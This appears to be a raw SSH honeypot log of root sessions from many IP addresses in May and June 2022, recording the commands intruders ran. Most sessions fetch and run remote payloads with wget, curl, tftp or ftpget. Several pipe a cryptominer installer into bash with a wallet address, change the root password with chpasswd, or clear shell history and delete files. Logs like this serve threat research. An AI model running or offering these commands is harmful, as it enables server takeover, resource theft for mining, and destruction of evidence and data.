PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 103.152.118.20 26-May-2022 01:54:16 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 92.205.21.38 26-May-2022 01:54:42 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 40.87.11.253 26-May-2022 02:01:09 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 188.75.153.218 26-May-2022 02:05:00 ssh2 root
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 43.242.247.139 26-May-2022 02:23:49 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 223.171.91.163 26-May-2022 02:47:41 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 222.100.124.62 26-May-2022 02:50:34 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 107.21.250.79 26-May-2022 05:18:36 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 93.176.229.145 26-May-2022 05:53:17 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig

From 78.92.170.193 26-May-2022 05:53:18 ssh2 root
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 78.92.170.193 26-May-2022 05:53:23 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 179.43.144.210 26-May-2022 13:35:02 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://2.56.59.196/Saitama.sh; curl -O http://2.56.59.196/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 2.56.59.196 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 2.56.59.196; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 2.56.59.196 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://2.56.59.196/Saitama.sh
curl -O http://2.56.59.196/Saitama.sh
chmod 777 Saitama.sh
sh Saitama.sh
tftp 2.56.59.196 -c get tSaitama.sh
chmod 777 tSaitama.sh
sh tSaitama.sh
tftp -r tSaitama2.sh -g 2.56.59.196
chmod 777 tSaitama2.sh
sh tSaitama2.sh
ftpget -v -u anonymous -p anonymous -P 21 2.56.59.196 Saitama1.sh Saitama1.sh
sh Saitama1.sh
rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh
rm -rf *

From 85.202.169.117 27-May-2022 07:51:36 ssh2 root
Exec wget 46.19.137.50/sh; chmod 777 sh; ./sh myx86
wget 46.19.137.50/sh
chmod 777 sh
./sh myx86

From 20.40.49.189 28-May-2022 01:04:19 ssh2 root
Exec uname -s -v -n -r;nproc;
uname -s -v -n -r
nproc

From 179.43.154.185 28-May-2022 07:03:04 ssh2 root
Exec echo root:d33gs34tij24iu33j3i433gh33g43r3g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:d33gs34tij24iu33j3i433gh33g43r3g|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 38.55.192.181 28-May-2022 15:35:02 ssh2 root
cd
ifconfig
ethtool eth0
netstat -natp
wget http://38.55.192.181:5555/csrss

From 179.43.142.180 28-May-2022 19:15:49 ssh2 root
Exec echo root:dgti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 38.55.196.195 29-May-2022 08:24:22 ssh2 root
ifconfig
ls
wget http://38.55.196.195:6236/csrss

From 179.43.142.180 29-May-2022 16:42:26 ssh2 root
Exec echo root:dgti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 185.210.144.122 30-May-2022 03:17:15 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 185.210.144.122 30-May-2022 03:17:35 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 118.218.209.149 30-May-2022 03:26:26 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig

From 153.121.44.98 30-May-2022 03:26:26 ssh2 root
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 117.54.14.169 30-May-2022 03:31:13 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 67.48.56.148 30-May-2022 03:58:05 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 64.98.86.50 30-May-2022 08:44:41 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.60.126/krn.tar || curl -o krn.tar http://209.141.60.126/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456
cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.60.126/krn.tar || curl -o krn.tar http://209.141.60.126/krn.tar
tar -xf krn.tar
cd krn
chmod +x *
./sshd
./krane 123456

From 42.193.125.35 30-May-2022 16:40:05 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 212.193.30.249 30-May-2022 21:03:58 ssh2 root
Exec uname -a ; wget http://49.212.165.107/img/.a/a.tgz ; tar -xf a.tgz ; rm -rf a.tgz ; perl a.pdf ; rm -rf a.pdf ; history -c
uname -a
wget http://49.212.165.107/img/.a/a.tgz
tar -xf a.tgz
rm -rf a.tgz
perl a.pdf
rm -rf a.pdf
history -c

From 179.43.142.180 30-May-2022 22:04:06 ssh2 root
Exec echo root:3gti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://peace.2fbaidu.com/x86_64; chmod 777 *; ./x86_64 x86hxed
echo root:3gti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget http://peace.2fbaidu.com/x86_64
chmod 777 *
./x86_64 x86hxed

From 179.43.142.180 1-Jun-2022 07:19:35 ssh2 root
Exec echo root:3gti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://peace.2fbaidu.com/x86_64; chmod 777 *; ./x86_64 x86hxed
echo root:3gti3j26jti5u5ji6rgg73554313gg3|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget http://peace.2fbaidu.com/x86_64
chmod 777 *
./x86_64 x86hxed

From 37.0.10.182 1-Jun-2022 20:50:09 ssh2 root
Exec cd /tmp/; rm -rf *x86*; wget 198.98.62.154/x86_64; chmod 777 x86_64; ./x86_64 x86xhed
cd /tmp/
rm -rf *x86*
wget 198.98.62.154/x86_64
chmod 777 x86_64
./x86_64 x86xhed

From 37.0.10.182 2-Jun-2022 04:13:04 ssh2 root
Exec cd /tmp/; rm -rf *x86*; wget 198.98.62.154/x86_64; chmod 777 x86_64; ./x86_64 x86xhed
cd /tmp/
rm -rf *x86*
wget 198.98.62.154/x86_64
chmod 777 x86_64
./x86_64 x86xhed

From 83.224.158.217 2-Jun-2022 20:10:39 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 83.224.158.217 2-Jun-2022 20:22:31 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 209.141.60.126 2-Jun-2022 20:42:27 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec uname -a
uname -a

From 51.83.232.233 3-Jun-2022 03:48:47 ssh2 root
Exec cd /tmp ; wget 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/cnrig ; chmod 777 cnrig ; ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history ; history -c
cd /tmp
wget 137.74.144.79/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 137.74.144.79/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 137.74.144.79/cnrig
chmod 777 cnrig
./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B
history -c
cat /dev/null > ~/.bash_history
history -c
rm -rf /root/.bash_history
history -c

From 209.141.60.126 3-Jun-2022 16:54:06 ssh2 root
Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.60.126/krn.tar || curl -o krn.tar http://209.141.60.126/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456
cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.60.126/krn.tar || curl -o krn.tar http://209.141.60.126/krn.tar
tar -xf krn.tar
cd krn
chmod +x *
./sshd
./krane 123456

From 209.141.60.126 3-Jun-2022 17:54:05 ssh2 root
Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.60.126/krn.tar || curl -o krn.tar http://209.141.60.126/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456
cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.60.126/krn.tar || curl -o krn.tar http://209.141.60.126/krn.tar
tar -xf krn.tar
cd krn
chmod +x *
./sshd
./krane 123456

From 150.95.137.118 4-Jun-2022 05:22:54 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred
perl /tmp/dred

From 179.43.154.185 4-Jun-2022 06:45:03 ssh2 root
Exec echo root:d33gs34tij24iu33j3i4333gh33g43rg33g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; cd /tmp; wget http://2.56.57.167/x86_64; chmod 777 *; ./x86_64 x86hxed
echo root:d33gs34tij24iu33j3i4333gh33g43rg33g|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
cd /tmp
wget http://2.56.57.167/x86_64
chmod 777 *
./x86_64 x86hxed

From 179.43.154.185 4-Jun-2022 08:20:41 ssh2 root
Exec echo root:d33gs34tij24iu33j3i4333gh33g43rg33g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; cd /tmp; wget http://2.56.57.167/x86_64; chmod 777 *; ./x86_64 x86hxed
echo root:d33gs34tij24iu33j3i4333gh33g43rg33g|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
cd /tmp
wget http://2.56.57.167/x86_64
chmod 777 *
./x86_64 x86hxed

From 179.43.142.180 4-Jun-2022 14:47:37 ssh2 root
Exec echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://2.56.57.167/x86_64; chmod 777 *; ./x86_64 x86hxed
echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget http://2.56.57.167/x86_64
chmod 777 *
./x86_64 x86hxed

From 18.132.68.163 5-Jun-2022 02:01:17 ssh2 root
ls
uname -a
cat /proc/cpuinfo
ifconfig
nano /etc/ssh/sshd_config
yum
apt-get
apt-get install nano
apt-get install nano install nano nanogg33hg|chpasswd|bash install nano install nano nanogg33hg|chpasswd|bash nano install nano nanogg33hg|chpasswd|bash/master/setup_c3pool_miner.sh install nano install nano nanogg33hg|chpasswd|bash install nano install nano nanogg33hg|chpasswd|bash nano install nano nanogg33hg|chpasswd|bash/master/setup_c3pool_miner.sh nano install
nano /var/ssh/sshd_config
nano

From 18.132.68.163 5-Jun-2022 02:05:05 ssh2 root
ls
cd ..
ls
vf /
cd /
ls
cat proxy.doc
ls -a

From 164.132.200.123 5-Jun-2022 06:57:54 ssh2 root
